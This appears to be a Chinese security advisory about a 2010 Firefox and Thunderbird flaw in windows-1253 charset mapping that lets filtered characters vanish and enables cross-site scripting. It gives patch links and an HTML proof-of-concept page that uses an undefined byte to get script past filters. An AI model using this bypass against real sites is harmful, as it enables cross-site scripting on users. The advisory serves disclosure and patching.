发表:
红科网安 发布:Amxking
受影响系统:
Mozilla Firefox 3.6.x
Mozilla Thunderbird 3.1.x
不受影响系统:
Mozilla Firefox 3.6.7
Mozilla Thunderbird 3.1.1
描述:
Firefox是一款流行的开源WEB浏览器。
一些8位编码包含有未定义的位置,映射到了U+FFFD。在显示的时候,可能不会显示紧随之后的字符。例如,windows-1253中的{'\xD1', '\xD2', '\xD3', 'xD4'}序列应为{U+3A1, U+FFFD, U+3A3, U+3A4}(也就是字符串Ρ�ΣΤ),但实际结果为{U+3A1, U+FFFD, U+3A4},缺少了U+3A3字符(也就是Ρ�Τ字符串,缺少Σ)。
在某些站点上这可能导致
跨站脚本问题,因为服务器上过滤掉了某些应显示的字符。
<*来源:O. Andersen
链接:
http://secunia.com/advisories/39925/ http://www.mozilla.org/security/announce/2010/mfsa2010-44.html https://bugzilla.mozilla.org/show_bug.cgi?format=multiple&id=564679 https://www.redhat.com/support/errata/RHSA-2010-0547.html *>
测试方法:
以下
程序(方法)可能带有
攻击性,仅供
安全研究与教学之用。使用者风险自负!
复制代码- <!DOCTYPE HTML>
- <html>
- <head>
- <meta http-equiv="Content-type" content="text/html; charset=windows-1253">
- <title>Test for Unicode non-characters</title>
- <script type="text/javascript" src="/MochiKit/packed.js"></script>
- <script type="text/javascript" src="/tests/SimpleTest/SimpleTest.js"></script>
- <link rel="stylesheet" type="text/css" href="/tests/SimpleTest/test.css" />
- <title>Firefox字符映射错误显示漏洞EXP-AKT专用版</title>
- </head>
- <body onload="test()">
- <pre id="test">
- <script class="testbody" type="text/javascript">
-
- /** test that single byte decoding resynchronizes after incomplete sequences */
- function test()
- {
- is($("display").innerHTML, "All good.", "No overconsumption");
- SimpleTest.finish();
- }
-
- SimpleTest.waitForExplicitFinish();
- </script>
- </pre>
- <a target="_blank" href="Mozilla">http://bbs.honkwin.com/read-htm-tid-7237.html">about this Bug </a>
- <p id="display">Evil.</p>
- <div id="content" style="display: none"></div>
- Ò<script type="text/javascript">
- $("display").innerHTML = "All good.";
- </script> ->
- </body>
- </html>
|
建议:
厂商补丁:
Mozilla
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页
下载:
http://www.mozilla.org/ RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2010:0547-01)以及相应补丁:
RHSA-2010:0547-01:Critical: firefox security update
链接:
https://www.redhat.com/support/errata/RHSA-2010-0547.html